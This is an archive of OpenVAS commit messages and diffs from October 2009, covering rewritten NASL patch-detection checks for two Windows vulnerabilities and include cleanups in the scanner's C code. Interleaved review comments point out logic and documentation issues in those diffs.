2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/win_CVE-2008-0080.nasl 2009-10-05 06:51:33 UTC (rev 5361) 
@@ -1,107 +1,127 @@ -# +################################################################################ # This script was written by Carsten Koch-Mauthe # # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Modified to Implement 'smb_nt.inc' +# - By Nikita MR On 2009-09-18 +################################################################################ if(description) { + script_id(90015); + script_version ("$Revision: 03 $"); + script_cve_id("CVE-2008-0080"); + script_bugtraq_id(27670); + script_name("Mini-Redirector Heap Overflow Vulnerability"); + desc = " + Overview: This host has critical security update missing according to + Microsoft Bulletin MS008-007 - script_id(90015); - script_version ("$Revision: 01 $"); - script_cve_id("CVE-2008-0080"); - name = "Mini-Redirector Heap Overflow Vulnerability"; - script_name(name); + Vulnerability Insight: + A boundary error occurs in the WebDAV Mini-Redirector when handling long + pathnames in WebDAV responses. - desc = "The remote host is probably affected by the vulnerability described in -CVE-2008-0080 + Impact: + Succesful exploitation will allow attackes to execute arbitrary code and + completely compromise the affected computer. + References: + http://secunia.com/advisories/28894 + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0080 + http://www.microsoft.com/technet/security/bulletin/ms08-007.mspx -Impact - Heap-based buffer overflow in the WebDAV Mini-Redirector - in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, - and Vista allows remote attackers to execute arbitrary - code via a crafted WebDAV response. + Workarounds: + Disable the WebClient Service. 
-References: - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0080 - http://www.microsoft.com/technet/security/bulletin/ms08-007.mspx + Solution: + Run Windows Update and update the listed hotfixes or download and + update mentioned hotfixes in the advisory from the below link, + http://www.microsoft.com/technet/security/bulletin/ms08-007.mspx + Risk factor : Critical"; -Workarounds - Disable the WebClient Service. + script_description(desc); + script_summary("Mini-Redirector Heap Overflow Vulnerability"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("Windows : Microsoft Bulletins"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_ports(139, 445); + exit(0); +} -Solution: - All Users should upgrade to the latest version. +include("smb_nt.inc"); +include("secpod_reg.inc"); +include("version_func.inc"); +include("secpod_smb_func.inc"); +if(hotfix_check_sp(xp:3, win2003:3) <= 0) +{ + exit(0); +} -Risk factor : High"; +# MS08-007 Hotfix check +if(hotfix_missing(name:"946026") == 0) +{ + exit(0); +} - script_description(desc); - summary = "Mini-Redirector Heap Overflow Vulnerability"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - script_require_ports(139, 445); - exit(0); +sysPath = registry_get_sz(item:"Install Path", + key:"SOFTWARE\Microsoft\COM3\Setup"); +if(!sysPath) +{ + exit(0); } -# -# The code starts here -# +share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:sysPath); +file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", + string:sysPath + "\drivers\mrxdav.sys"); +sysVer = GetVer(file:file, share:share); +if(!sysVer) +{ + exit(0); +} -local_var os; +# Windows XP +if(hotfix_check_sp(xp:3) > 0) +{ + SP = get_kb_item("SMB/WinXP/ServicePack"); + if("Service Pack 2" >< SP) + { + # Grep for mrxdav.sys version < 5.1.2600.3276 + 
if(version_in_range(version:sysVer, test_version:"5.1", + test_version2:"5.1.2600.3275")){ + security_hole(0); + } + } + else + security_hole(0); +} -include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); - - win_dir = get_windir(); - if( !isnull(win_dir) ) { - os = get_kb_item("SMB/OS"); - filespec = win_dir+"system32\drivers\mrxdav.sys"; - test_version = NULL; - if( "WINDOWS VISTA" >< os ) { - test_version = "6.0.6000.16626"; - } else { - if( "WINDOWS 5.1" >< os ) { - test_version = "5.1.2600.3276"; - } else { - if( "WINDOWS SERVER 2003" >< os ) { - if( "SERVICE PACK 2" >< os ) { - test_version = "5.2.3790.4206"; - } else { - test_version = "5.2.3790.3060"; - } - } - } +# Windows 2003 +else if(hotfix_check_sp(win2003:3) > 0) +{ + SP = get_kb_item("SMB/Win2003/ServicePack"); + if("Service Pack 2" >< SP) + { + # Grep for mrxdav.sys version < 5.2.3790.4206 + if(version_in_range(version:sysVer, test_version:"5.2", + test_version2:"5.2.3790.4205")){ + security_hole(0); } - if( !isnull(test_version) ) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - orig_filename = filespec; - if( smbgetfile(share: "C$", filename: orig_filename, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:orig_filename); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - security_hole(port:0, proto:"Win"); - report = report + "Fileversion : C$ "+orig_filename + " "+v+string("\n"); - security_hole(port:0, proto:"Win", data:report); - } - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } else { - report = string(filespec+" not found/no access -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } + } + else if("Service Pack 1" >< SP) + { + # Grep 
for mrxdav.sys version < 5.2.3790.3060 + if(version_in_range(version:sysVer, test_version:"5.2", + test_version2:"5.2.3790.3059")){ + security_hole(0); } } - -exit(0); + else + security_hole(0); +} Modified: trunk/openvas-plugins/scripts/win_CVE-2008-0087.nasl =================================================================== --- trunk/openvas-plugins/scripts/win_CVE-2008-0087.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/win_CVE-2008-0087.nasl 2009-10-05 06:51:33 UTC (rev 5361) 
@@ -1,108 +1,117 @@ -# +##################################################################################### # This script was written by Carsten Koch-Mauthe # # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Modified to Implement 'smb_nt.inc' +# - By Sharath S On 2009-09-21 +# +###################################################################################### if(description) { + script_id(90020); + script_version ("$Revision: 03 $"); + script_cve_id("CVE-2008-0087"); + script_bugtraq_id(28553); + script_name("Windows vulnerability in DNS Client Could Allow Spoofing (945553)"); + desc = " + The remote host is probably affected by the vulnerability described in + CVE-2008-0087 - script_id(90020); - script_version ("$Revision: 01 $"); - script_cve_id("CVE-2008-0087"); - name = "Windows vulnerability in DNS Client Could Allow Spoofing (945553)"; - script_name(name); + Impact: + The DNS client in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, + and Vista uses predictable DNS transaction IDs, which allows remote attackers + to spoof DNS responses. - desc = "The remote host is probably affected by the vulnerability described in -CVE-2008-0087 + References: + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0087 + http://www.microsoft.com/technet/security/bulletin/ms08-020.mspx + Solution: + All Users should upgrade to the latest version. -Impact - The DNS client in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 - and SP2, and Vista uses predictable DNS transaction IDs, which allows - remote attackers to spoof DNS responses. 
+ Risk factor : High"; -References: - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0087 - http://www.microsoft.com/technet/security/bulletin/ms08-020.mspx + script_description(desc); + script_summary("Windows vulnerability in DNS Client Could Allow Spoofing (945553)"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("Windows : Microsoft Bulletins"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} -Solution: - All Users should upgrade to the latest version. +include("smb_nt.inc"); +include("secpod_reg.inc"); +include("version_func.inc"); +include("secpod_smb_func.inc"); -Risk factor : High"; +if(hotfix_check_sp(xp:3, win2k:5, win2003:3) <= 0){ + exit(0); +} - script_description(desc); - summary = "Windows vulnerability in DNS Client Could Allow Spoofing (945553)"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - script_require_ports(139, 445); - exit(0); +# MS08-020 Hotfix check +if(hotfix_missing(name:"945553") == 0){ + exit(0); } -# -# The code starts here -# +dllPath = registry_get_sz(key:"SOFTWARE\Microsoft\COM3\Setup", + item:"Install Path"); +if(!dllPath){ + exit(0); +} -local_var os; +share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:dllPath); +file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", + string:dllPath + "\Dnsapi.dll"); -include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); +dllVer = GetVer(file:file, share:share); +if(!dllVer){ + exit(0); +} - win_dir = get_windir(); - sec_hole = 0; - if( !isnull(win_dir) ) { - os = get_kb_item("SMB/OS"); - filespec = win_dir+"system32\Dnsapi.dll"; - test_version = NULL; - if( "WINDOWS VISTA" >< os ) { - test_version = "6.0.6000.16615"; - } else { - if( "WINDOWS 5.1" >< os ) { - test_version 
= "5.1.2600.3316"; - } else { - if( "WINDOWS SERVER 2003" >< os ) { - if( "SERVICE PACK 2" >< os ) { - test_version = "5.2.3790.4238"; - } else { - test_version = "5.2.3790.3092"; - } - } else { - if( "WINDOWS 5.0" >< os ) { - test_version = "5.0.2195.7151"; - } - } - } +# Windows 2K +if(hotfix_check_sp(win2k:5) > 0) +{ + # Grep for Dnsapi.dll version < 5.0.2195.7151 + if(version_is_less(version:dllVer, test_version:"5.0.2195.7151")){ + security_hole(0); + } +} + +# Windows XP +else if(hotfix_check_sp(xp:3) > 0) +{ + # Grep for Dnsapi.dll < 5.1.2600.3316 + if(version_is_less(version:dllVer, test_version:"5.1.2600.3316")){ + security_hole(0); + } +} + +# Windows 2003 +else if(hotfix_check_sp(win2003:3) > 0) +{ + SP = get_kb_item("SMB/Win2003/ServicePack"); + if("Service Pack 2" >< SP) + { + # Grep for Dnsapi.dll version < 5.2.3790.4238 + if(version_is_less(version:dllVer, test_version:"5.2.3790.4238")){ + security_hole(0); } - if( !isnull(test_version) ) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - if( sec_hole == 0 ) { - security_hole(port:0, proto:"Win"); - sec_hole = 1; - } - security_hole(port:0, proto:"Win", data:"Version found : C$ "+filespec + " "+v+string("\n")+ - "Version expected : "+test_version+" or higher "+string("\n")); - } - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } - } else { - report = string(filespec+" not found/no access -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"SMB", data:report); - } + } + if("Service Pack 1" >< SP) + { + # Grep for Dnsapi.dll version < 5.2.3790.3092 + 
if(version_is_less(version:dllVer, test_version:"5.2.3790.3092")){ + security_hole(0); } } - -exit(0); + else + security_hole(0); +} From scm-commit at wald.intevation.org Mon Oct 5 10:45:04 2009 
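Review bot: in the Windows 2003 branch the second test, `if("Service Pack 1" >< SP)`, is a separate `if` rather than an `else if`, so the trailing `else security_hole(0);` binds to it and fires for every host whose SMB/Win2003/ServicePack value does not contain "Service Pack 1". A Service Pack 2 host whose Dnsapi.dll is at 5.2.3790.4238 or later passes the first version check and is then reported as vulnerable by that `else`. Chain the tests as `if("Service Pack 2" >< SP){...} else if("Service Pack 1" >< SP){...} else security_hole(0);`. Separately, the removed code compared against 6.0.6000.16615 for Windows Vista, while the new `hotfix_check_sp(xp:3, win2k:5, win2003:3)` gate lists only XP, 2000 and 2003 and no Vista branch follows; if dropping Vista is intended, the script description should say so.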
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org)
Date: Mon, 5 Oct 2009 10:45:04 +0200 (CEST)
Subject: [Openvas-commits] r5362 - in trunk/openvas-scanner: cnvts/ssl_ciphers openvassd
Message-ID: <20091005084504.A705885C72FF@pyrosoma.intevation.org>

Author: felix
Date: 2009-10-05 10:45:01 +0200 (Mon, 05 Oct 2009)
New Revision: 5362

Modified:
   trunk/openvas-scanner/cnvts/ssl_ciphers/ssl_ciphers.c
   trunk/openvas-scanner/openvassd/comm.c
   trunk/openvas-scanner/openvassd/comm.h
   trunk/openvas-scanner/openvassd/hosts.c
   trunk/openvas-scanner/openvassd/locks.c
   trunk/openvas-scanner/openvassd/nasl_plugins.c
   trunk/openvas-scanner/openvassd/nes_plugins.c
   trunk/openvas-scanner/openvassd/ntp_11.c
   trunk/openvas-scanner/openvassd/ntp_11.h
   trunk/openvas-scanner/openvassd/parser.c
   trunk/openvas-scanner/openvassd/pluginlaunch.c
   trunk/openvas-scanner/openvassd/pluginload.c
   trunk/openvas-scanner/openvassd/pluginload.h
   trunk/openvas-scanner/openvassd/pluginscheduler.h
   trunk/openvas-scanner/openvassd/plugs_hash.c
   trunk/openvas-scanner/openvassd/plugs_req.h
   trunk/openvas-scanner/openvassd/preferences.c
   trunk/openvas-scanner/openvassd/rules.c
   trunk/openvas-scanner/openvassd/save_kb.h
   trunk/openvas-scanner/openvassd/shared_socket.c
   trunk/openvas-scanner/openvassd/users.c
   trunk/openvas-scanner/openvassd/users.h
   trunk/openvas-scanner/openvassd/utils.h
Log:
Towards removal of libopenvas.h.

* openvassd/utils.h, openvassd/users.c, openvassd/users.h,
openvassd/shared_socket.c, openvassd/save_kb.h, openvassd/rules.c,
openvassd/preferences.c, openvassd/plugs_req.h, openvassd/plugs_hash.c,
openvassd/pluginscheduler.h, openvassd/pluginload.h,
openvassd/pluginload.c, openvassd/pluginlaunch.c, openvassd/parser.c,
openvassd/ntp_11.h, openvassd/ntp_11.c, openvassd/nes_plugins.c,
openvassd/nasl_plugins.c, openvassd/locks.c, openvassd/hosts.c,
openvassd/comm.h, openvassd/comm.c, cnvts/ssl_ciphers/ssl_ciphers.c:
Added/cleaned up includes.

Modified: trunk/openvas-scanner/cnvts/ssl_ciphers/ssl_ciphers.c =================================================================== --- trunk/openvas-scanner/cnvts/ssl_ciphers/ssl_ciphers.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/cnvts/ssl_ciphers/ssl_ciphers.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -6,9 +6,11 @@ * * This plugin was written by Michel Arboi */ - + #include "includes.h" +#include /* for emalloc */ + #ifndef ssl_get_cipher_by_char #define ssl_get_cipher_by_char(ssl,ptr) \ ((ssl)->method->get_cipher_by_char((unsigned char*)ptr)) Modified: trunk/openvas-scanner/openvassd/comm.c =================================================================== --- trunk/openvas-scanner/openvassd/comm.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/comm.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -33,17 +33,25 @@ #include +#include +#include /* for ACT_FIRST */ + #include "auth.h" -#include "rules.h" -#include "comm.h" -#include "sighand.h" + +#include "comm.h" +#include "network.h" /* for recv_line */ #include "ntp.h" #include "ntp_11.h" #include "log.h" #include "plugs_hash.h" +#include "pluginscheduler.h" /* for define LAUNCH_DISABLED */ +#include "plugutils.h" /* for plug_get_oid */ +#include "rules.h" +#include "sighand.h" +#include "system.h" /* for emalloc */ #include "utils.h" -#include + #ifndef FALSE #define FALSE 0 #endif Modified: trunk/openvas-scanner/openvassd/comm.h =================================================================== --- trunk/openvas-scanner/openvassd/comm.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/comm.h 2009-10-05 08:45:01 UTC (rev 5362) 
@@ -30,6 +30,9 @@ #ifndef _OPENVAS_COMM_H #define _OPENVAS_COMM_H +#include "ntp.h" /* for struct ntp_caps */ +#include /* for struct arglist */ + ntp_caps* comm_init(int); void comm_terminate(struct arglist *); void comm_send_pluginlist(struct arglist *); Modified: trunk/openvas-scanner/openvassd/hosts.c =================================================================== --- trunk/openvas-scanner/openvassd/hosts.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/hosts.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -28,6 +28,11 @@ */ #include + +#include /* for internal_recv */ +#include /* for INTERNAL_COMM_MSG_TYPE_CTRL */ +#include /* for estrdup */ + #include "utils.h" #include "log.h" #include "preferences.h" Modified: trunk/openvas-scanner/openvassd/locks.c =================================================================== --- trunk/openvas-scanner/openvassd/locks.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/locks.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -28,6 +28,9 @@ */ #include + +#include /* for efree */ + #include "utils.h" #include "log.h" Modified: trunk/openvas-scanner/openvassd/nasl_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/nasl_plugins.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/nasl_plugins.c 2009-10-05 08:45:01 UTC (rev 5362) 
@@ -34,8 +34,14 @@ #include #include +#include /* for internal_send */ +#include /* for ACT_SCANNER */ +#include /* for INTERNAL_COMM_CTRL_FINISHED */ +#include /* for store_plugin */ +#include /* for emalloc */ #include "pluginload.h" +#include "pluginscheduler.h" /* for LAUNCH_DISABLED */ #include "plugs_hash.h" #include "preferences.h" #include "processes.h" Modified: trunk/openvas-scanner/openvassd/nes_plugins.c =================================================================== --- trunk/openvas-scanner/openvassd/nes_plugins.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/nes_plugins.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -29,9 +29,12 @@ #include +#include "libopenvas.h" + #include #include "pluginload.h" +#include "pluginscheduler.h" /* for LAUNCH_DISABLED */ #include "plugs_hash.h" #include "processes.h" #include "log.h" Modified: trunk/openvas-scanner/openvassd/ntp_11.c =================================================================== --- trunk/openvas-scanner/openvassd/ntp_11.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/ntp_11.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -31,6 +31,10 @@ #include +#include /* for recv_line */ +#include /* for plug_get_name */ +#include /* for emalloc */ + #include "ntp.h" #include "ntp_11.h" #include "otp_1_0.h" Modified: trunk/openvas-scanner/openvassd/ntp_11.h =================================================================== --- trunk/openvas-scanner/openvassd/ntp_11.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/ntp_11.h 2009-10-05 08:45:01 UTC (rev 5362) 
@@ -30,6 +30,9 @@ #ifndef _OPENVAS_NTP_11_H #define _OPENVAS_NTP_11_H + +#include /* for struct arglist */ + #define NTP_STOP_WHOLE_TEST 2 int ntp_11_parse_input(struct arglist *, char *); Modified: trunk/openvas-scanner/openvassd/parser.c =================================================================== --- trunk/openvas-scanner/openvassd/parser.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/parser.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -29,6 +29,8 @@ #include +#include /* for emalloc */ + /** @TODO Contents of this file is duplicate in openvas-scanner/openvassd/parser.c * and openvas-client/openvas/parser.c . Move to libraries and merge, once * openvas-client depends on libraries. */ Modified: trunk/openvas-scanner/openvassd/pluginlaunch.c =================================================================== --- trunk/openvas-scanner/openvassd/pluginlaunch.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/pluginlaunch.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -28,6 +28,12 @@ */ #include + +#include /* for internal_send */ +#include /* for ACT_SCANNER */ +#include /* for INTERNAL_COMM_MSG_SHARED_SOCKET */ +#include /* for efree */ + #include "pluginload.h" #include "piic.h" #include "utils.h" Modified: trunk/openvas-scanner/openvassd/pluginload.c =================================================================== --- trunk/openvas-scanner/openvassd/pluginload.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/pluginload.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -30,6 +30,7 @@ #include #include +#include /* for emalloc */ #include Modified: trunk/openvas-scanner/openvassd/pluginload.h =================================================================== --- trunk/openvas-scanner/openvassd/pluginload.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/pluginload.h 2009-10-05 08:45:01 UTC (rev 5362) 
@@ -31,6 +31,9 @@ #ifndef _OPENVAS_PLUGINLOAD_H #define _OPENVAS_PLUGINLOAD_H +#include /* for struct arglist */ +#include /* for struct kb_item */ + struct arglist * plugins_init(struct arglist *, int); struct arglist * plugins_reload(struct arglist *, struct arglist *, int); void plugin_set_socket(struct arglist *, int); Modified: trunk/openvas-scanner/openvassd/pluginscheduler.h =================================================================== --- trunk/openvas-scanner/openvassd/pluginscheduler.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/pluginscheduler.h 2009-10-05 08:45:01 UTC (rev 5362) @@ -31,6 +31,15 @@ #ifndef PLUGINSCHEDULER_H #define PLUGINSCHEDULER_H +/** + * @brief States of scheduler_plugin. + * + * @todo Consider creating an enumeration. + */ +#define LAUNCH_DISABLED 0 +#define LAUNCH_RUN 1 +#define LAUNCH_SILENT 2 + struct scheduler_plugin { int running_state; int category; Modified: trunk/openvas-scanner/openvassd/plugs_hash.c =================================================================== --- trunk/openvas-scanner/openvassd/plugs_hash.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/plugs_hash.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -29,6 +29,11 @@ #include + +#include /* for auth_printf */ +#include /* for send_fd */ +#include /* for efree */ + #include #include "users.h" #include "log.h" Modified: trunk/openvas-scanner/openvassd/plugs_req.h =================================================================== --- trunk/openvas-scanner/openvassd/plugs_req.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/plugs_req.h 2009-10-05 08:45:01 UTC (rev 5362) 
@@ -31,6 +31,9 @@ #ifndef PLUGINS_REQUIREMENTS_H__ #define PLUGINS_REQUIREMENTS_H__ +#include /* for struct kb_item */ +#include /* for struct arglist */ + char * requirements_plugin(struct kb_item **, struct scheduler_plugin *, struct arglist *); Modified: trunk/openvas-scanner/openvassd/preferences.c =================================================================== --- trunk/openvas-scanner/openvassd/preferences.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/preferences.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -45,7 +45,9 @@ */ #include + #include +#include /* for efree */ #include "glib.h" #include "comm.h" Modified: trunk/openvas-scanner/openvassd/rules.c =================================================================== --- trunk/openvas-scanner/openvassd/rules.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/rules.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -29,6 +29,9 @@ #include + +#include /* for efree */ + #include #include "comm.h" #include "utils.h" Modified: trunk/openvas-scanner/openvassd/save_kb.h =================================================================== --- trunk/openvas-scanner/openvassd/save_kb.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/save_kb.h 2009-10-05 08:45:01 UTC (rev 5362) @@ -31,6 +31,8 @@ #ifndef SAVE_KB_H__ #define SAVE_KB_H__ +#include /* for struct arglist */ + int save_kb_new(struct arglist*, char *); void save_kb_close(struct arglist*, char*); Modified: trunk/openvas-scanner/openvassd/shared_socket.c =================================================================== --- trunk/openvas-scanner/openvassd/shared_socket.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/shared_socket.c 2009-10-05 08:45:01 UTC (rev 5362) 
@@ -35,6 +35,12 @@ */ #include + +#include /* internal_recv */ +#include /* for INTERNAL_COMM_MSG_SHARED_SOCKET */ +#include /* for recv_fd */ +#include /* for efree */ + #include "utils.h" #include "log.h" Modified: trunk/openvas-scanner/openvassd/users.c =================================================================== --- trunk/openvas-scanner/openvassd/users.c 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/users.c 2009-10-05 08:45:01 UTC (rev 5362) @@ -29,6 +29,9 @@ #include + +#include /* for emalloc */ + #include #include "log.h" #include "users.h" Modified: trunk/openvas-scanner/openvassd/users.h =================================================================== --- trunk/openvas-scanner/openvassd/users.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/users.h 2009-10-05 08:45:01 UTC (rev 5362) @@ -30,6 +30,9 @@ #ifndef _OPENVAS_USERS_H #define _OPENVAS_USERS_H + +#include /* for struct arglist */ + #define BAD_LOGIN_ATTEMPT (struct openvas_rules*)(-1) #define OPENVAS_MAX_USERNAME_LEN 32 /* Including the ending nul byte! */ Modified: trunk/openvas-scanner/openvassd/utils.h =================================================================== --- trunk/openvas-scanner/openvassd/utils.h 2009-10-05 06:51:33 UTC (rev 5361) +++ trunk/openvas-scanner/openvassd/utils.h 2009-10-05 08:45:01 UTC (rev 5362) @@ -31,6 +31,9 @@ #ifndef _OPENVAS_UTILS_H #define _OPENVAS_UTILS_H +#include "ntp.h" /* for struct ntp_caps */ +#include /* for struct arglist */ + struct attack_atom { char * name; From scm-commit at wald.intevation.org Mon Oct 5 11:09:09 2009 
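Review bot: in openvassd/nes_plugins.c the hunk adds `#include "libopenvas.h"`, which runs against the stated goal of this commit ("Towards removal of libopenvas.h"); every other file in the patch gains individual headers, each with a `/* for ... */` reason. If nes_plugins.c cannot be switched to the individual headers yet, say so in the log or put a @todo next to the include so the umbrella header is not left behind here.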
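Review bot: in openvassd/pluginscheduler.h the new Doxygen block describes LAUNCH_DISABLED, LAUNCH_RUN and LAUNCH_SILENT as "States of scheduler_plugin" and sits directly above a struct whose `running_state` member reads like the field they belong to. The scheduler code shown in r5363 on this page assigns PLUGIN_STATUS_UNRUN to `running_state` and passes LAUNCH_SILENT to `plug_set_launch`, so the @brief should call these launch modes for `plug_set_launch` and not states of the struct. The @todo about an enumeration is fine as it stands.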
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org)
Date: Mon, 5 Oct 2009 11:09:09 +0200 (CEST)
Subject: [Openvas-commits] r5363 - in trunk/openvas-scanner: . openvassd
Message-ID: <20091005090909.649FF861EAB6@pyrosoma.intevation.org>

Author: felix
Date: 2009-10-05 11:09:07 +0200 (Mon, 05 Oct 2009)
New Revision: 5363

Modified:
   trunk/openvas-scanner/ChangeLog
   trunk/openvas-scanner/openvassd/piic.c
   trunk/openvas-scanner/openvassd/pluginscheduler.c
   trunk/openvas-scanner/openvassd/plugs_req.c
   trunk/openvas-scanner/openvassd/save_kb.c
   trunk/openvas-scanner/openvassd/save_tests.c
   trunk/openvas-scanner/openvassd/utils.c
Log:
* openvassd/pluginscheduler.c, openvassd/plugs_req.c,
openvassd/save_kb.c, openvassd/save_tests.c, openvassd/utils.c,
openvassd/piic.c: Cosmetics, doc, todos added.

* ChangeLog: corrected with last entry.

@@ -1,3 +1,25 @@ +2009-10-05 Felix Wolfsteller + + * openvassd/pluginscheduler.c, openvassd/plugs_req.c, + openvassd/save_kb.c, openvassd/save_tests.c, openvassd/utils.c, + openvassd/piic.c: Cosmetics, doc, todos added. + + * ChangeLog: corrected with last entry. + +2009-10-05 Felix Wolfsteller + + Towards removal of libopenvas.h. + + * openvassd/utils.h, openvassd/users.c, openvassd/users.h, + openvassd/shared_socket.c, openvassd/save_kb.h, openvassd/rules.c, + openvassd/preferences.c, openvassd/plugs_req.h,, openvassd/plugs_hash.c, + openvassd/pluginscheduler.h, openvassd/pluginload.h, + openvassd/pluginload.c, openvassd/pluginlaunch.c, openvassd/parser.c, + openvassd/ntp_11.h, openvassd/ntp_11.c, openvassd/nes_plugins.c, + openvassd/nasl_plugins.c, openvassd/locks.c, openvassd/hosts.c, + openvassd/comm.h, openvassd/comm.c, cnvts/ssl_ciphers/ssl_ciphers.c: + Added/cleaned up includes. + 2009-09-28 Jan-Oliver Wagner Post-release version bump. Modified: trunk/openvas-scanner/openvassd/piic.c =================================================================== --- trunk/openvas-scanner/openvassd/piic.c 2009-10-05 08:45:01 UTC (rev 5362) +++ trunk/openvas-scanner/openvassd/piic.c 2009-10-05 09:09:07 UTC (rev 5363) 
@@ -29,105 +29,118 @@ #include + #include "log.h" #include "save_kb.h" #include "utils.h" #include "piic.h" - -void kb_parse(int soc, struct arglist * globals, struct kb_item ** kb, char * buf, int msg ) +/** + * @brief Modifies the knowledge base or sends content of a kb item. + * + * If the knowledge base is going to be saved to disc, modify the entry on the + * file system, too. + * + * @param soc "Internal" socket to the child process that queries the kb or + * requests modification. + * @param msg Explicitly handled if INTERNAL_COMM_KB_GET, + * INTERNAL_COMM_KB_REPLACE (defined in plugutils.h) + */ +void +kb_parse (int soc, struct arglist * globals, struct kb_item ** kb, char * buf, + int msg) { - char * t; - int type; - char *c; - int buf_len; - char * copy; - char * name; - char * value; - - if( buf == NULL || kb == NULL ) - return; + char * t; + int type; + char *c; + int buf_len; + char * copy; + char * name; + char * value; - if ( msg & INTERNAL_COMM_KB_GET ) - { - struct kb_item * kitem = kb_item_get_single(kb, buf, 0); + if (buf == NULL || kb == NULL) + return; - if ( kitem == NULL ) - { - internal_send(soc, NULL, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_ERROR); - return; - } - - if ( kitem->type == KB_TYPE_STR ) - { - internal_send(soc, kitem->v.v_str, INTERNAL_COMM_MSG_TYPE_KB|INTERNAL_COMM_KB_SENDING_STR); - return; - } - else if ( kitem->type == KB_TYPE_INT ) - { - char buf[64]; - snprintf(buf, sizeof(buf), "%d", kitem->v.v_int); - internal_send(soc, buf, 